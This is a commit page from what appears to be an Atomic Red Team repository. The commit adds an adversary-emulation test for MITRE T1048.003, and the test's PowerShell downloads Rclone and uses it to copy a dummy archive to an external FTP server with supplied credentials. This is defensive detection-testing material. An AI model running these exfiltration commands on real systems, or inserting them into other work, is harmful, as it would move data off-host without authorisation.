security-tools/atomic-red-team
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Updated T1048.003 to include Rclone (#2202)

Browse Source 
* Updated T1048.003 to include Rclone 

Added the use of Rclone to exfiltrate data to an external FTP server.

* Updated the test as discussed.

* Fixed the typo

Co-authored-by: Carrie Roberts <clr2of8@gmail.com>
This commit is contained in:
BlueTeamOps
2022-11-01 05:58:24 +11:00
committed by GitHub
parent 8c427d03ea
commit a69e08e6ae
1 changed files with 46 additions and 0 deletions
Download Patch File Download Diff File Expand all files Collapse all files
atomics/T1048.003/T1048.003.yaml
+46
View File
@@ -159,3 +159,49 @@ atomic_tests:
$ftp_del.Method = [System.Net.WebRequestMethods+Ftp]::DeleteFile
$ftp_del.GetResponse()}} catch{}
name: powershell
- name: Exfiltration Over Alternative Protocol - FTP - Rclone
auto_generated_guid: b854eb97-bf9b-45ab-a1b5-b94e4880c56b
description: |-
Rclone may be used by an adversary to exfiltrate data to a publicly hosted FTP server.
[Reference](https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/)
supported_platforms:
- windows
input_arguments:
ftp_server:
description: Your own ftp server
type: string
default: ftp.dlptest.com
ftp_pass:
description: Your FTP user's password
type: string
default: rNrKYTX9g7z3RgJRmxWuGHbeu
ftp_user:
description: Your FTP username
type: string
default: dlpuser
ftp_port:
description: Your FTP's port
type: string
default: 21
dependency_executor_name: powershell
dependencies:
- description: |
Check if the exfil package exists
prereq_command: |
if (Test-Path C:\Users\Public\Downloads\exfil.zip) {exit 0} else {exit 1}
get_prereq_command: |
fsutil file createnew C:\Users\Public\Downloads\exfil.zip 20485760
- description: 'Check if rclone zip exists'
prereq_command: |
if (Test-Path C:\Users\Public\Downloads\rclone-current-windows-amd64.zip) {exit 0} else {exit 1}
get_prereq_command: |
Invoke-WebRequest -Uri "https://downloads.rclone.org/rclone-current-windows-amd64.zip" -OutFile "C:\Users\Public\Downloads\rclone-current-windows-amd64.zip"
Expand-Archive C:\Users\Public\Downloads\rclone-current-windows-amd64.zip -DestinationPath C:\Users\Public\Downloads\
executor:
command: |-
$rclone_bin = Get-ChildItem C:\Users\Public\Downloads\ -Recurse -Include "rclone.exe" | Select-Object -ExpandProperty FullName
$exfil_pack = Get-ChildItem C:\Users\Public\Downloads\ -Recurse -Include "exfil.zip" | Select-Object -ExpandProperty FullName
&$rclone_bin config create ftpserver "ftp" "host" #{ftp_server} "port" #{ftp_port} "user" #{ftp_user} "pass" #{ftp_pass}
&$rclone_bin copy --max-age 2y $exfil_pack ftpserver --bwlimit 2M -q --ignore-existing --auto-confirm --multi-thread-streams 12 --transfers 12 -P --ftp-no-check-certificate
name: powershell
elevation_required: true